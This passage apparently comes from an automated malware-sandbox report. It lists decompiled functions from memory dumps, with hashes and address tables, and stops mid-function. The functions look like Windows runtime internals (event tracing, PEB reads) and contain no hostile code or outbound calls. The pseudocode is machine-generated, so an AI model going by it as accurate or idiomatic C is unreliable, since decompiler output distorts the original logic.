                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 534d57c44a4554cb31d55cdcee21f9cc50269cf0ea0434d55c42aee050b1f25e
                                                    • Instruction ID: 032d1a1afb63605807bcb22d9a446cb6fc7753879ae8ce0cd242a2f9296663f7
                                                    • Opcode Fuzzy Hash: 534d57c44a4554cb31d55cdcee21f9cc50269cf0ea0434d55c42aee050b1f25e
                                                    • Instruction Fuzzy Hash: A401B571A00248AFDB04EFA9D841FAEB7B8EF44714F04405AF905EB380DA74EE01CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C0138A, Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 61%
                                                    			E04C0138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4c3d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04B8FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04B67D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04B8B640(E04B89AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                    0x04c0138a
                                                    0x04c0138a
                                                    0x04c01399
                                                    0x04c013a3
                                                    0x04c013a8
                                                    0x04c013aa
                                                    0x04c013b5
                                                    0x04c013bb
                                                    0x04c013c3
                                                    0x04c013c6
                                                    0x04c013c9
                                                    0x04c013d4
                                                    0x04c013e6
                                                    0x04c013d6
                                                    0x04c013df
                                                    0x04c013df
                                                    0x04c013f1
                                                    0x04c013f2
                                                    0x04c013f4
                                                    0x04c013f9
                                                    0x04c0140e

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 687a7ac4428a17fbbd43df6960dbf78bdf5c2b51fad535e0dd248f055e31da5b
                                                    • Instruction ID: 1fecf8fffb50e73ccd0f72e045794775b22e5832817d3fa6b03b9e7ac17c3e6c
                                                    • Opcode Fuzzy Hash: 687a7ac4428a17fbbd43df6960dbf78bdf5c2b51fad535e0dd248f055e31da5b
                                                    • Instruction Fuzzy Hash: 9A015271A00218AFDB14EFA9D881FAEB7B8EF44714F04405AF905EB280DA75EE01C794
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B458EC, Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E04B458EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x4c3d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x4b25c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04B45943() != 0 &&  *0x4c35320 > 5) {
					E04BC7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04BC7B5E( &_v28, _t28);
					_t11 = E04BC7B9C(0x4c35320, 0x4b2bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E04B8B640(_t11, _t17, _v8 ^ _t29, 0x4b2bf15, _t27, _t28);
			}















                                                    0x04b458fb
                                                    0x04b458fe
                                                    0x04b45906
                                                    0x04b4590a
                                                    0x04b4593c
                                                    0x04b4593c
                                                    0x04b4590c
                                                    0x04b4590c
                                                    0x04b45911
                                                    0x00000000
                                                    0x04b45913
                                                    0x04b45913
                                                    0x04b45913
                                                    0x04b45911
                                                    0x04b4591d
                                                    0x04ba1035
                                                    0x04ba103c
                                                    0x04ba103f
                                                    0x04ba1056
                                                    0x04ba1056
                                                    0x04b4593b

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f12d39477fe9f69372a18eef491b5d9e56e64f539f340b54232727ad9750bbc
                                                    • Instruction ID: 6b00ae9e377e836a6b04c96062940be846ee72f754518de09449eb40c37e8785
                                                    • Opcode Fuzzy Hash: 3f12d39477fe9f69372a18eef491b5d9e56e64f539f340b54232727ad9750bbc
                                                    • Instruction Fuzzy Hash: A201A735B04518BBE724EE79D8509BE77BCEFC4234F9400E9AA05A7240EE30FD01D651
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B5B02A, Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B5B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04B67D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04BC7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                    0x04b5b037
                                                    0x04b5b039
                                                    0x04b5b03b
                                                    0x04b5b040
                                                    0x04baa60e
                                                    0x00000000
                                                    0x00000000
                                                    0x04baa61d
                                                    0x04b5b04b
                                                    0x04b5b04e
                                                    0x04baa627
                                                    0x04baa634
                                                    0x00000000
                                                    0x00000000
                                                    0x04baa641
                                                    0x04baa653
                                                    0x04baa643
                                                    0x04baa64c
                                                    0x04baa64c
                                                    0x04baa65b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04baa66c
                                                    0x04b5b057
                                                    0x04b5b057
                                                    0x04b5b057
                                                    0x04b5b046
                                                    0x04b5b046
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                    • Instruction ID: 2d01b010ec2563f138c05a4b331d43f55d4318d7c5c13195ce98982a9c99475f
                                                    • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                    • Instruction Fuzzy Hash: 8B0171712085809FD326D76CC984F66B7D8EB45754F0D40E1E915CB6A1D628FC40C620
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C11074, Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04C11074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E04C1165E(__ebx, 0x4c38ae4, (__edx -  *0x4c38b04 >> 0x14) + (__edx -  *0x4c38b04 >> 0x14), __edi, __ecx, (__edx -  *0x4c38b04 >> 0x14) + (__edx -  *0x4c38b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E04C0AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04B67D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E04BFFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                    0x04c11074
                                                    0x04c11080
                                                    0x04c11082
                                                    0x04c1108a
                                                    0x04c1108f
                                                    0x04c11093
                                                    0x04c110ab
                                                    0x04c110ab
                                                    0x04c110c3
                                                    0x04c110cf
                                                    0x04c110e1
                                                    0x04c110d1
                                                    0x04c110da
                                                    0x04c110da
                                                    0x04c110e9
                                                    0x04c110f5
                                                    0x04c110f5
                                                    0x04c110fe

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6d832d12d3b9420cb3cd0345d8d3646796c4394a18e6b14afa8f36b5c70e6baa
                                                    • Instruction ID: d5d47ca1e3d95fcbd41c2c06571a85b1af90a8acc76242fddc1089dc260664ce
                                                    • Opcode Fuzzy Hash: 6d832d12d3b9420cb3cd0345d8d3646796c4394a18e6b14afa8f36b5c70e6baa
                                                    • Instruction Fuzzy Hash: 080140715047419FD710EF24CD00B5A77D6EB84318F08C555F945832A0DE35F940D7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BFFEC0, Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E04BFFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4c3d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04B8FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04B67D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04B8B640(E04B89AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                    0x04bffec0
                                                    0x04bffec0
                                                    0x04bffecf
                                                    0x04bffed9
                                                    0x04bffede
                                                    0x04bffee0
                                                    0x04bffeeb
                                                    0x04bffef3
                                                    0x04bffef6
                                                    0x04bffef9
                                                    0x04bfff04
                                                    0x04bfff16
                                                    0x04bfff06
                                                    0x04bfff0f
                                                    0x04bfff0f
                                                    0x04bfff21
                                                    0x04bfff22
                                                    0x04bfff24
                                                    0x04bfff29
                                                    0x04bfff3e

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 86db663acdf9be56f8f86891ca7077acd863d2b5f77f2b6bd63ac886f36818d4
                                                    • Instruction ID: 3059a11bd23f89e9d0464e2818cbfad01c5fd9225e2c58d105a33b1ff037c51e
                                                    • Opcode Fuzzy Hash: 86db663acdf9be56f8f86891ca7077acd863d2b5f77f2b6bd63ac886f36818d4
                                                    • Instruction Fuzzy Hash: 31018871E01208ABDB14EFA9D845FBEB7B8EF44714F4040AAF9059B290DA74E901C794
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BFFE3F, Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E04BFFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4c3d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04B8FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04B67D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04B8B640(E04B89AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                    0x04bffe3f
                                                    0x04bffe3f
                                                    0x04bffe4e
                                                    0x04bffe58
                                                    0x04bffe5d
                                                    0x04bffe5f
                                                    0x04bffe6a
                                                    0x04bffe72
                                                    0x04bffe75
                                                    0x04bffe78
                                                    0x04bffe83
                                                    0x04bffe95
                                                    0x04bffe85
                                                    0x04bffe8e
                                                    0x04bffe8e
                                                    0x04bffea0
                                                    0x04bffea1
                                                    0x04bffea3
                                                    0x04bffea8
                                                    0x04bffebd

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e6ae03953e179202b217dc437d1af82119b9294dfdb4a99e1e0ae36ae7a4493a
                                                    • Instruction ID: 5116031bf7cec6da61b034134a780c571aef60fb2f44ed271355944d69237e57
                                                    • Opcode Fuzzy Hash: e6ae03953e179202b217dc437d1af82119b9294dfdb4a99e1e0ae36ae7a4493a
                                                    • Instruction Fuzzy Hash: A7018471E00208ABDB14EFA9D845FBEB7B8EF44714F0044AAF905AB291DA74E901C794
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C18ED6, Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E04C18ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x4c3d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04B67D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E04B8B640(E04B89AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                    0x04c18ed6
                                                    0x04c18ee5
                                                    0x04c18eed
                                                    0x04c18ef0
                                                    0x04c18efa
                                                    0x04c18f03
                                                    0x04c18f0c
                                                    0x04c18f15
                                                    0x04c18f24
                                                    0x04c18f27
                                                    0x04c18f31
                                                    0x04c18f43
                                                    0x04c18f33
                                                    0x04c18f3c
                                                    0x04c18f3c
                                                    0x04c18f4e
                                                    0x04c18f4f
                                                    0x04c18f51
                                                    0x04c18f56
                                                    0x04c18f69

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f4461d8ea8ed7927cc5796535a394df0157766a0306738f1db7616a39f23269
                                                    • Instruction ID: b3dae00cef951c1f321b6722f3e102ad34034cbf9fc8c4c7eed6620923c6d518
                                                    • Opcode Fuzzy Hash: 5f4461d8ea8ed7927cc5796535a394df0157766a0306738f1db7616a39f23269
                                                    • Instruction Fuzzy Hash: EA112170E042099FDB04EFA9D441BAEF7F4FF08304F0442AAE519EB381E634A940DB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C18A62, Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E04C18A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x4c3d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04B67D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04B8B640(E04B89AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                    0x04c18a62
                                                    0x04c18a71
                                                    0x04c18a79
                                                    0x04c18a82
                                                    0x04c18a85
                                                    0x04c18a89
                                                    0x04c18a8c
                                                    0x04c18a8f
                                                    0x04c18a92
                                                    0x04c18a95
                                                    0x04c18a9f
                                                    0x04c18ab1
                                                    0x04c18aa1
                                                    0x04c18aaa
                                                    0x04c18aaa
                                                    0x04c18abc
                                                    0x04c18abd
                                                    0x04c18abf
                                                    0x04c18ac4
                                                    0x04c18ada

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0283526e96c5c0ea4122ecd2db3bd5c7424b73d9d54e8fd7089c071219cb6f24
                                                    • Instruction ID: ab5b6bd70954e6bebb9379a9a3268aab403137b17645aaec66b8e9b834560492
                                                    • Opcode Fuzzy Hash: 0283526e96c5c0ea4122ecd2db3bd5c7424b73d9d54e8fd7089c071219cb6f24
                                                    • Instruction Fuzzy Hash: DD0121B1A0421C9FDB04EFA9D9419EEB7B8EF49714F10405AF905E7351DA34AD01CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B4DB60, Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B4DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E04B4DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E04B4E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L04B4E8B0(__ecx, _t14, 0xfff);
							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                    0x04b4db64
                                                    0x04b4db66
                                                    0x04b4db6b
                                                    0x04b4dbaa
                                                    0x04b4db71
                                                    0x04b4db76
                                                    0x04b4db7a
                                                    0x04b4dba3
                                                    0x04b4db7c
                                                    0x04b4db87
                                                    0x04b4db8b
                                                    0x04ba4fa1
                                                    0x04ba4fb3
                                                    0x04ba4fb8
                                                    0x04b4db91
                                                    0x04b4db96
                                                    0x04b4db98
                                                    0x04b4db98
                                                    0x04b4db8b
                                                    0x04b4db7a
                                                    0x04b4db9d
                                                    0x04b4dba2

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                    • Instruction ID: e41f41a8fb12a27dd521d105e8ea3837334600d1919e68626e2bb6d67a6e1222
                                                    • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                    • Instruction Fuzzy Hash: 79F096333456229FE7726B558880F6BB6ADDFC1A64F1604F5F1099B344CE64EC02B6E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B4B1E1, Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B4B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04B67D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04B67D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04BC7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                    0x04b4b1e8
                                                    0x04b4b1ea
                                                    0x04b4b1f3
                                                    0x04ba4a17
                                                    0x04b4b1f9
                                                    0x04b4b1f9
                                                    0x04b4b1f9
                                                    0x04b4b201
                                                    0x04ba4a21
                                                    0x04ba4a2e
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba4a3b
                                                    0x04ba4a4d
                                                    0x04ba4a3d
                                                    0x04ba4a46
                                                    0x04ba4a46
                                                    0x04ba4a55
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b4b20a
                                                    0x04b4b20a
                                                    0x04b4b20a
                                                    0x04b4b20a

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                    • Instruction ID: e8630220519a52e77f10afa80dbb4007a68d8bc93bb5ffa84e8e12ad95f4939f
                                                    • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                    • Instruction Fuzzy Hash: 8001F9323085809BE7229B5DC844F597B98EF81758F0804E1FA158B6B1EA78F811E715
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BDFE87, Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 46%
                                                    			E04BDFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x4c3d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04B67D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04B8B640(E04B89AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                    0x04bdfe96
                                                    0x04bdfe9e
                                                    0x04bdfea1
                                                    0x04bdfead
                                                    0x04bdfeb3
                                                    0x04bdfeb9
                                                    0x04bdfec3
                                                    0x04bdfed5
                                                    0x04bdfec5
                                                    0x04bdfece
                                                    0x04bdfece
                                                    0x04bdfee0
                                                    0x04bdfee1
                                                    0x04bdfee3
                                                    0x04bdfee8
                                                    0x04bdfefb

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 712316dd1a54df831e2e6112899b8bd077f979c1e3ebcf9fc8a0a657d3f20f48
                                                    • Instruction ID: 465312cca410370de5c2dca0ef641d0301701e78616e029d38e0a60317c74543
                                                    • Opcode Fuzzy Hash: 712316dd1a54df831e2e6112899b8bd077f979c1e3ebcf9fc8a0a657d3f20f48
                                                    • Instruction Fuzzy Hash: 82011270A04208AFDB14DFA8D545A6EB7F4EF04304F144599B519DB392EA35E901CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C18F6A, Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 48%
                                                    			E04C18F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
